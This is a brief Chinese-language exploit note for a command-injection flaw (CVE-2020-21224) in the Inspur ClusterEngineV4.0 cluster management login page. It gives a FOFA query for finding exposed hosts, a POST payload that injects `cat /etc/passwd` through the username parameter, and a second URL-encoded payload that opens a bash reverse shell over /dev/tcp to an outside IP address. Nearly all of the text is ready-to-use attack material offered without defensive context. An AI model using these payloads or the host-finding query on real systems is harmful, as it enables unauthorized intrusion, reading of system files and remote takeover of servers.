浪潮 ClusterEngineV4.0 集群管理系统 命令执行漏洞 (CVE-2020-21224)¶
FOFA:
title="TSCEV4.0"
登录处username存在RCE 可直接构造恶意参数进行命令执行:
POST /login.php
op=login&username=;`cat /etc/passwd`&password="
shell op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`
ref: